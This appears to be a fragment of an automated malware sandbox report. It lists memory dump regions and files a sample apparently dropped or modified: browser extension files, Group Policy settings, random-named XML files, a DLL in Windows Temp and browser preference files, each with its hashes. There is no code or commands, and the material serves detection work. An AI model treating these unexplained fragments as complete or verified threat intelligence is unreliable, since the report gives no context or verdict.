SHA512 a41303344f2148387eb72230e2af5f2475d8c91ec96a298e5b7600fcdd5d0d07bd2af2603c074183e0aa8dee85e0fb7f0ec36d8437924c7d3654f895d84baed1

memory/2008-160-0x0000000073220000-0x00000000739D1000-memory.dmp

memory/5100-170-0x0000000002F80000-0x0000000002FE4000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 2eed991e6e31d306e68ef64d773d3e16
SHA1 27b5035255d679a7015d1a2e5bfcc5f124160689
SHA256 3b839645035f3ad69591e7e9db4967a695877782e57703ee61d64eeb11be7fa1
SHA512 d124006d52504010a7dd99599e58b026c28febe793e77609b6151152a7d3765cc52f3fec504680f7d9b08e183d3190858580c7035f9d95990292241535d40404

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

MD5 bd6b60b18aee6aaeb83b35c68fb48d88
SHA1 9b977a5fbf606d1104894e025e51ac28b56137c3
SHA256 b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA512 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

C:\Program Files (x86)\orRvbnhdU\HJtjZab.xml

MD5 c11c890df632243cc3a57843dba04745
SHA1 34bccc1069fadee775775b1277e0018790f2c909
SHA256 58a6ed8432fff7101552c0a253d2d5aacf94d72be2833da4b52416c833ed6020
SHA512 550dbe74fe7b483572827aa2a559454592c339079f806d318d94839d71d1140e5a3b50c34d67c1a402d1944cafb0ffcb45c5a12ae6b48ef64b7dbed8ef5ae89f

C:\Program Files (x86)\YrliKKkuhgWU2\IDhYlhm.xml

MD5 76846a0729472885efc22a0aea0ad7db
SHA1 066300eb9a9bb37932e7d493469ae2061fc77109
SHA256 c1cb16d2af84d641ab3f6ac76d0acb56ae95d110484fc8461bc39c67bd1d00e5
SHA512 d2344057e23a2d110a0b200edc3b65b0c8a40cf504c8485b9d655bc196bcb4955ca51c05ff92dca52c7350dfb227c22fc980529f21ec9ef96ceedd25b6a214dc

C:\ProgramData\qgjSpVnHOWlNdqVB\aewiCMC.xml

MD5 8d731b2443ecebb1e879d4b74e8d4222
SHA1 2c7c7676f1826dc01bcdcc47c9109592dbbb598d
SHA256 5f4eb8b5fb0c41cd3b88efcab8951aaa30998c29b312d5a0e9a4f34168a06775
SHA512 3a771996d56c84782df5d71953b54b2ab8d85f17036494bcd13cb78c12feb7dd36d5fa1a5fdb6446da22a5bfba59e4b6a142058eaf7e3d0e580aa9007db3d188

C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\XWITLon.xml

MD5 7b41975ea22f0f966fee56eb408575a5
SHA1 52659584014f8b18d154457e22e4b193b2eae2e3
SHA256 8ad74a73a5f6fd1dcb1ccb179ce2d27795dfe9094dd13715c8d9bef3c816fcf5
SHA512 518f23ae60e884a62fbe421ce1d68d3017b01bc347d6a7a7894a561d0f263f9fd60e05dc32883ad70a9becabf63c639044ca7a902b471d306303c636c5da414f

C:\Program Files (x86)\ycfBUKIjHxeOC\PxTyDEW.xml

MD5 aa8df0dba23dc740417a5b1978080699
SHA1 779a1ff81b666df7f910340e1c752da47972ee76
SHA256 c39b43f0e94aebd895a68df0a30b01a1b4b27f3afc2c2e5b8898a4e9b77040f5
SHA512 abef3ac7adeada357e92bc2c52d25d8b1ae6d93bd1ae3b7e311e0b6fcf176288fe3ae01df8d93ee867d962ce1128ddaa45ea24a94fa262b0e60b192324271ab4

C:\Windows\Temp\lwSRcZKonRlOofsg\hKfdPiVg\EyGBVHY.dll

MD5 db0e0228f220bd8fa3b45a0043744456
SHA1 e287442ab5c21cab796c6893a34f0474820b6515
SHA256 9d17deafa6484b95a25345472c61bfbf7c510b4fafd2a52e7806db27ec4a6883
SHA512 a6d1aa8dc12f47ca1b9781264f02a4058287eb3bca0033ec9c3d3bd4adc9e3ac87c6bfcb361dc90ea40c056e0a9f29a28c7454afef5233a11c13c5c40d35f763

memory/5100-501-0x0000000003300000-0x0000000003383000-memory.dmp

memory/4352-503-0x0000000001530000-0x0000000001B03000-memory.dmp

memory/5100-517-0x0000000003CB0000-0x0000000003D7F000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\8ypl8oso.default-release\prefs.js

MD5 732ff4cecfb5a3558daf67b652aaaaef
SHA1 9a743435e6c612ed469449db47ba442e19451166
SHA256 79626ca22daf36a549e4a192e9b96be879ff0b51879a12f9c62bbe0bfeb8d2ab
SHA512 4bbe415e4242356d30c98b7856e74c73481db410243aa8bedb06d6c6b0f847131b801a51beccab962bc616fe5df3ecdb59b01dc8eaa30afc395e9ab9b8f3273f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 a8ac56ba8e1716c58f7b1cd7f1881dc3
SHA1 7d55d0d9855edb088bd40b2a9185d52df2a655a1
SHA256 fd0a7897b29bb511df34d115c561e48b5869e9112efa24df10c862191b79b76e
SHA512 0bd001b7170ebe012ddd25dc3bd65127a3d509574c7c394f447ad7f445e059199dfb84f20ce8f3301c25ff351a1b16e375001e3f833d3c1da28f0e43f3541ff0

memory/3416-574-0x0000000000AE0000-0x000000000119E000-memory.dmp

memory/5100-579-0x0000000000D30000-0x00000000013EE000-memory.dmp